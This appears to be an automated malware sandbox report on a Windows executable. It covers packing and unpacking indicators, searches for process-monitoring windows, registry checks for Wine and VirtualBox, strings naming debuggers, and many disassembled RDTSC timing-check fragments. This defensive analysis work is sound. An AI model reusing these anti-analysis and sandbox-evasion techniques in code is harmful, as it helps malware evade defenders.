Source: s8kPMNXOZY.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: s8kPMNXOZY.exeStatic PE information: Raw size of njaplbck is bigger than: 0x100000 < 0x1be800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeUnpacked PE file: 0.2.s8kPMNXOZY.exe.240000.0.unpack :EW;.rsrc:W;.idata :W; :EW;njaplbck:EW;rewyqdml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;njaplbck:EW;rewyqdml:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: s8kPMNXOZY.exeStatic PE information: real checksum: 0x457a0d should be: 0x450301
Source: s8kPMNXOZY.exeStatic PE information: section name:
Source: s8kPMNXOZY.exeStatic PE information: section name: .idata
Source: s8kPMNXOZY.exeStatic PE information: section name:
Source: s8kPMNXOZY.exeStatic PE information: section name: njaplbck
Source: s8kPMNXOZY.exeStatic PE information: section name: rewyqdml
Source: s8kPMNXOZY.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69C83 push ecx; retf 0039h0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69C83 push ecx; retf 0039h0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F5F860 push eax; iretd 0_3_00F5F861
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F5FC60 pushad ; iretd 0_3_00F5FC61
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F61432 push eax; ret 0_3_00F61541
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69922 push ecx; retf 001Eh0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69922 push ecx; retf 001Eh0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69C83 push ecx; retf 0039h0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69C83 push ecx; retf 0039h0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F5F860 push eax; iretd 0_3_00F5F861
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F5FC60 pushad ; iretd 0_3_00F5FC61
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F61432 push eax; ret 0_3_00F61541
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69922 push ecx; retf 001Eh0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69922 push ecx; retf 001Eh0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F6999D push ecx; iretd 0_3_00F699C4
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69C83 push ecx; retf 0039h0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69C83 push ecx; retf 0039h0_3_00F69C84
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F5F860 push eax; iretd 0_3_00F5F861
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F5FC60 pushad ; iretd 0_3_00F5FC61
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F61432 push eax; ret 0_3_00F61541
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69922 push ecx; retf 001Eh0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_3_00F69922 push ecx; retf 001Eh0_3_00F69924
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002961A1 push es; retn 007Ch0_2_002961A2
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_005C41D0 push eax; mov dword ptr [esp], edx0_2_005C41D5
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002C2340 push eax; mov dword ptr [esp], 00000000h0_2_002C2343
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeCode function: 0_2_002FC7F0 push eax; mov dword ptr [esp], 00000000h0_2_002FC743
Source: s8kPMNXOZY.exeStatic PE information: section name: njaplbck entropy: 7.955985417488292

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: s8kPMNXOZY.exe, 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, s8kPMNXOZY.exe, 00000000.00000003.1306024830.0000000007120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA448C second address: AA4491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA4491 second address: AA4496 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA4602 second address: AA4625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA127EBE8h 0x00000008 jne 00007F6FA127EBD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA4890 second address: AA48A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jne 00007F6FA0B89506h 0x0000000d jmp 00007F6FA0B8950Ah 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA48A8 second address: AA48BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F6FA127EBDBh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA6ED6 second address: AA6EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA6EDB second address: AA6EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA6EE1 second address: AA6F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F6FA0B89510h 0x00000010 jo 00007F6FA0B89506h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 movzx edi, si 0x0000001c push 1AD721C2h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA6F12 second address: AA6FCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F6FA127EBD8h 0x0000000c popad 0x0000000d xor dword ptr [esp], 1AD72142h 0x00000014 jmp 00007F6FA127EBDCh 0x00000019 push 00000003h 0x0000001b jmp 00007F6FA127EBDDh 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F6FA127EBD8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c jmp 00007F6FA127EBE8h 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007F6FA127EBD8h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d xor cl, 00000040h 0x00000060 mov dx, 376Dh 0x00000064 call 00007F6FA127EBD9h 0x00000069 jmp 00007F6FA127EBE3h 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 jng 00007F6FA127EBD6h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA6FCB second address: AA6FD1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA6FD1 second address: AA6FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA7088 second address: AA70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+129C31A2h], eax 0x0000000f push 00000000h 0x00000011 call 00007F6FA0B89509h 0x00000016 pushad 0x00000017 jng 00007F6FA0B89508h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA70AF second address: AA70B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA70B3 second address: AA70F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F6FA0B8951Bh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F6FA0B8950Eh 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA70F0 second address: AA7101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jp 00007F6FA127EBDEh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA7240 second address: AA7244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA7244 second address: AA7248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA72C9 second address: AA72E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F6FA0B89508h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA72E2 second address: AA732F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+129C3898h] 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+129C1C0Eh], esi 0x00000018 call 00007F6FA127EBD9h 0x0000001d jo 00007F6FA127EBE2h 0x00000023 jnp 00007F6FA127EBDCh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA732F second address: AA7334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA7334 second address: AA737D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA127EBDAh 0x00000008 jg 00007F6FA127EBD6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F6FA127EBE9h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 jmp 00007F6FA127EBDEh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA737D second address: AA73E9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6FA0B89516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F6FA0B89514h 0x00000013 pop eax 0x00000014 mov edx, dword ptr [ebp+129C38E8h] 0x0000001a push 00000003h 0x0000001c push esi 0x0000001d mov ecx, edx 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 mov ecx, dword ptr [ebp+129C3624h] 0x00000028 push 00000003h 0x0000002a mov edi, 6D3F2DD4h 0x0000002f push B4790D4Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 jns 00007F6FA0B89517h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA73E9 second address: AA73EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AA73EE second address: AA743D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 74790D4Ch 0x0000000e jmp 00007F6FA0B89518h 0x00000013 cld 0x00000014 lea ebx, dword ptr [ebp+12B48E19h] 0x0000001a je 00007F6FA0B89506h 0x00000020 xchg eax, ebx 0x00000021 jc 00007F6FA0B89525h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6FA0B89513h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7A2F second address: AC7A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7A35 second address: AC7A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B89518h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7A52 second address: AC7A57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7A57 second address: AC7A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007F6FA0B8950Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F6FA0B89522h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC59D3 second address: AC59D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC59D9 second address: AC59E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5CEC second address: AC5CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5CF0 second address: AC5CFA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6FA0B89506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5CFA second address: AC5D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5D00 second address: AC5D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5D05 second address: AC5D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5D0D second address: AC5D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5D13 second address: AC5D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F6FA127EBD8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5D27 second address: AC5D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5E7A second address: AC5E98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5E98 second address: AC5EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA0B89519h 0x00000008 jno 00007F6FA0B89506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC5EBC second address: AC5EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC6188 second address: AC618C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC618C second address: AC6192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC6192 second address: AC6196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC6196 second address: AC61AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC61AD second address: AC61D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA0B89519h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC61D1 second address: AC61F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE5h 0x00000007 jo 00007F6FA127EBD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC61F3 second address: AC61FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC634C second address: AC6352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: ABAD3B second address: ABAD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC715E second address: AC7162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7162 second address: AC7174 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F6FA0B89506h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7174 second address: AC719C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE6h 0x00000007 jne 00007F6FA127EBD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F6FA127EBDEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7319 second address: AC731D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC747B second address: AC74A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6FA127EBE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F6FA127EBD8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push ebx 0x00000015 pushad 0x00000016 jne 00007F6FA127EBD6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7628 second address: AC762E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC762E second address: AC7632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AC7632 second address: AC766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F6FA0B8950Ch 0x00000011 pushad 0x00000012 jbe 00007F6FA0B89506h 0x00000018 jnc 00007F6FA0B89506h 0x0000001e jmp 00007F6FA0B89514h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pop esi 0x00000028 rdtsc
